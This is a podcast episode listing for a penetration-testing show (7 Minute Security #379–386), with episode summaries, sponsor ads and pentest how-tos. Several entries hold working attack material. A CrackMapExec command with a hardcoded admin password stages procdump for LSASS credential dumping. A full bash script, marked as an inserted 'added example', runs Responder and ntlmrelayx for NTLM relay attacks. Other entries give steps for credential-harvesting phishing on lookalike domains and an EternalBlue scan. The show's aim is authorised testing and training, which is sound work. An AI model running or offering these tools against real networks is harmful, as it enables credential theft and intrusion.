
7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter, for now anyway) of my interview with the red team guys, Ryan and Dave! In today's episode we talk about:

- Running into angry system admins (that are either too fired up or not fired up enough)
- Being wrong without being ashamed
- When is it necessary to make too much noise to get caught during an engagement?
- What are the top 5 tools you run on every engagement?
- How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
- How do you deal with clients who scope things in such a way that the test is almost impossible to conduct?
- How do you deal with colleagues who take findings as their own when they talk with management?
- How do you work with clients who don't know why they want a test, except to check some sort of compliance checkmark?
- What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
- How could a fresh grad get into a red team job?
- What do recruiters look for in candidates seeking red team positions?
- If a red team is able to dump a whole database of hashes or a bundle of local machine hashes, should they crack them?
- What do you do when you're contracted for a pentest, but on day one you realize the org is not at all ready for one?
- What's your favorite red team horror story?
1 Nov 2019, 1h 24min

7MS #385: A Peek into the 7MS Mail Bag
Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered, from CompTIA and Cisco to EC-Council and VMware. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first, and only, episode that Mrs. 7MS has ever listened to).

Links to things discussed this episode:

Wireless pentest certs:
- SEC617 (SANS course that covers wifi pentesting, including WPA enterprise attacks)
- Offensive Security Wireless Professional

Good/free pentest training options:
- Pentester Academy
- VulnHub
- Rastalabs
- The Cyber Mentor

Free logging/alerting solutions for SMBs:
- WEFFLES
- Logging Made Easy
- HELK
- Wazuh
22 Oct 2019, 44min

7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns
In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include:

- Consider this list of top 9 phishing simulators.
- Check out GoPhish! Then spin up a free-tier Kali AWS box.
- Follow the instructions to install GoPhish and get it running on your AWS box.
- Use the Expired Domains site to buy up a domain that is similar to your victim's (maybe just one character off) but has been around a while and has a good reputation.
- Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain.
- Create a convincing cred-capturing portal on GoPhish. I used some absolutely disgusting and embarrassing HTML like this (see show notes on 7ms.us):
- Use this awesome article to secure your fancy landing page with a Let's Encrypt cert!
- Have fun!!!
12 Oct 2019, 50min

7MS #383: Tales of Internal Network Pentest Pwnage - Part 10
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9, where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

- Relayed one high-priv cred from one box to another
- Dumped and cracked a local machine's hash
- Passed that hash around the network
- Found (via BloodHound) some high value targets we wanted to grab domain admin creds from
- Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it. First, stage procdump on an Impacket SMB share on the attacking box (the wget runs from inside /share so the binary lands in the shared directory):

mkdir /share
cd /share
wget https://live.sysinternals.com/procdump64.exe
screen -R smb
/opt/impacket/examples/smbserver.py -smb2support share /share

Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'

(more on today's episode show notes)
1 Oct 2019, 30min

7MS #382: Tales of Internal Network Pentest Pwnage - Part 9
Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered, from CompTIA and Cisco to EC-Council and VMware. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network. This was an especially interesting one because the client had a lot of great security defenses in place, including:

- Strong user passwords
- A SIEM solution that appeared to be doing a great job

We did some looking for pwnage opportunities such as:

- Systems missing the EternalBlue patch
- Systems missing the BlueKeep patch

What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for, and pass, high-priv hashes.

Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.
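One way to turn the signing check above into a relay target list and then run the Responder/ntlmrelayx pair. This is an added example, not the gist the episode links to: it swaps nmap's smb2-security-mode script in for RunFinger.py (its "Message signing enabled but not required" line is easy to parse), and assumes Responder's config is at /etc/responder/Responder.conf (Kali's current location; older installs use /usr/share/responder/Responder.conf) and that the listening interface is eth0. The embedded nmap output is constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not the episode's gist): build an ntlmrelayx target list from hosts
# whose SMB signing is not required, then run the Responder + ntlmrelayx pair.
# Assumptions: nmap's smb2-security-mode script stands in for RunFinger.py,
# Responder.conf lives at /etc/responder/Responder.conf, interface is eth0.
set -u

RESPONDER_CONF=${RESPONDER_CONF:-/etc/responder/Responder.conf}
IFACE=${IFACE:-eth0}
TARGET_FILE=${TARGET_FILE:-targets.txt}

# Print the IP of every host whose SMB2 security mode says signing is not required.
# Reads nmap normal output (nmap -Pn -p445 --open --script smb2-security-mode <range>) on stdin.
relay_targets() {
  awk '
    /^Nmap scan report for / { host = $NF; gsub(/[()]/, "", host) }  # "name (ip)" or bare ip
    /Message signing enabled but not required/ || /Message signing disabled/ { print host }
  '
}

# Constructed sample: a DC that requires signing and two hosts that do not.
SAMPLE_NMAP='Nmap scan report for dc01.corp.local (10.0.0.5)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required

Nmap scan report for 10.0.0.7
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required

Nmap scan report for ws22.corp.local (10.0.0.9)
Host is up (0.0015s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required'

demo_targets() { printf '%s\n' "$SAMPLE_NMAP" | relay_targets; }

# Responder and ntlmrelayx both want ports 445 and 80; turn off Responder's own
# SMB and HTTP servers so poisoned victims connect to ntlmrelayx instead.
disable_responder_servers() {
  sed -i 's/^SMB = On/SMB = Off/; s/^HTTP = On/HTTP = Off/' "$RESPONDER_CONF"
}

run_relay() {
  # ntlmrelayx relays each captured NTLM authentication to the listed hosts; where the
  # relayed user is a local admin there, it dumps the SAM by default.
  ntlmrelayx.py -tf "$TARGET_FILE" -smb2support &
  # Responder poisons LLMNR/NBT-NS/mDNS so hosts authenticate to us in the first place.
  responder -I "$IFACE"
}

if [ "${1:-}" = "scan" ]; then
  nmap -Pn -p445 --open --script smb2-security-mode "${2:?network/cidr}" | relay_targets > "$TARGET_FILE"
  echo "$(grep -c . "$TARGET_FILE") relay target(s) written to $TARGET_FILE"
elif [ "${1:-}" = "relay" ]; then
  disable_responder_servers
  run_relay
fi
```

Usage is two passes: "./relay.sh scan 192.168.0.0/24" to write targets.txt, then "./relay.sh relay" once the target list has been reviewed against scope. Hosts that report "enabled and required" (domain controllers by default) are deliberately left out, since relayed authentication to them fails.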
24 Sep 2019, 34min

7MS #381: DIY $500 Pentesting Lab Deployment Tips
For Windows VMs

Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.

Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source):

powershell Install-PackageProvider -Name NuGet -Force
powershell Install-Module PSWindowsUpdate -Force
powershell Set-ExecutionPolicy Bypass
powershell Import-Module PSWindowsUpdate
powershell Get-WindowsUpdate
powershell Install-WindowsUpdate -AcceptAll -AutoReboot

To turn on remote desktop:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

To set the firewall to allow RDP:

Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

To stop the freakin' Windows hosts from going to sleep:

powercfg.exe -change -standby-timeout-ac 0

To automate the install of VMware Tools, grab the package from VMware's site, decompress it, then:

setup64.exe /s /v "/qn reboot=r"

To set the time zone via command line, run tzutil /l to list the zone names, then set your desired zone with something like:

tzutil /s "Central Standard Time"

For Linux VMs

Get SSH host keys regenerated and install/run the OpenSSH server:

apt install openssh-server -y
mkdir /etc/ssh/default_keys
mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/
dpkg-reconfigure openssh-server
systemctl enable ssh.service
systemctl start ssh.service

Then grab some essential pentesting tools using Kali essentials, and keep 'em updated (git update).

Next user group meeting September 30!
18 Sep 2019, 38min

7MS #380: Tales of Internal Network Pentest Pwnage - Part 8
Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered, from CompTIA and Cisco to EC-Council and VMware. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a continuation of episode #379, where we:

- Conducted general nmap scans (and additional scans specifically looking for EternalBlue)
- Sucked our nmap scans into EyeWitness
- Captured and cracked some creds with Paperspace
- Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)

Today, the adventure continues with:

- Checking the environment for CVE-2019-1040
- Picking apart the privileges on my "pseudo domain admin" account
- Making a startling discovery about how almost all corp passwords were stored

Enjoy!
5 Sep 2019, 28min

7MS #379: Tales of Internal Network Pentest Pwnage - Part 7
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

- Review of setting up your DIY pentest dropbox
- Choosing the right hardware (I'm partial to this NUC)
- Running Responder to catch creds
- Using EyeWitness to snag screenshots of stuff discovered with nmap scanning
- Scanning for EternalBlue with: nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
- Running SharpHound to get a map of the AD environment
- Cracking creds with Paperspace
- When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!
30 Aug 2019, 43min